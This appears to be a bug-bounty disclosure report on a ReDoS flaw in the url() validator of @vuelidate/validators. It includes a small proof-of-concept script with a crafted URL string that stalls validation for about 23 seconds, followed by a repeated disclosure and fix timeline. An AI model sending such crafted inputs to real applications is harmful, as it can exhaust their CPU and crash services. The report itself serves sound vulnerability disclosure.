Inefficient Regular Expression Complexity in vuelidate/vuelidate

Valid

Reported on

Sep 1st 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the @vuelidate/validators package. An attacker that is able to provide crafted input to the url(input) function may cause an application to consume an excessive amount of CPU.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs

import { url } from '@vuelidate/validators/dist/raw.esm.js';
var time = Date.now();
url('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost+" ms")

Execute the following command in another terminal:

npm i @vuelidate/validators
node poc.mjs

Check the Output:

Time taken to validate : 23153 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it's 23 sec. 📍 Location url.js#L3

Occurrences

url.js L3

ready-research submitted a

2 years ago

We have contacted a member of the vuelidate team and are waiting to hear back 2 years ago

ready-research modified the report

2 years ago

commented 2 years ago

Researcher

After applying the patch output is Time taken to validate : 4 ms

commented 2 years ago

Admin

Hey ready-research, I've emailed the repo's maintainer for you.

ready-research modified the report

2 years ago

Dobromir Hristov validated this vulnerability 2 years ago

ready-research has been awarded the disclosure bounty

The fix bounty is now up for grabs

Dobromir Hristov marked this as fixed with commit 1f0ca3 2 years ago

ready-research has been awarded the fix bounty

This vulnerability will not receive a CVE

Dobromir Hristov Dobromir

commented 2 years ago

Maintainer

The fix comes from https://gist.github.com/dperini/729294, but I gave credit to the developer who found the issue.

commented 2 years ago

Researcher

@Dobromir Thank you so much for the confirmation and credits.

commented 2 years ago

Admin

CVE published! 🎉

to join this conversation

ready-research submitted a

2 years ago

We have contacted a member of the vuelidate team and are waiting to hear back 2 years ago

ready-research modified the report

2 years ago

commented 2 years ago

Researcher

After applying the patch output is Time taken to validate : 4 ms

commented 2 years ago

Admin

Hey ready-research, I've emailed the repo's maintainer for you.

ready-research modified the report

2 years ago

Dobromir Hristov validated this vulnerability 2 years ago

ready-research has been awarded the disclosure bounty

The fix bounty is now up for grabs

Dobromir Hristov marked this as fixed with commit 1f0ca3 2 years ago

ready-research has been awarded the fix bounty

This vulnerability will not receive a CVE

Dobromir Hristov Dobromir

commented 2 years ago

Maintainer

The fix comes from https://gist.github.com/dperini/729294, but I gave credit to the developer who found the issue.

commented 2 years ago

Researcher

@Dobromir Thank you so much for the confirmation and credits.

commented 2 years ago

Admin

CVE published! 🎉

to join this conversation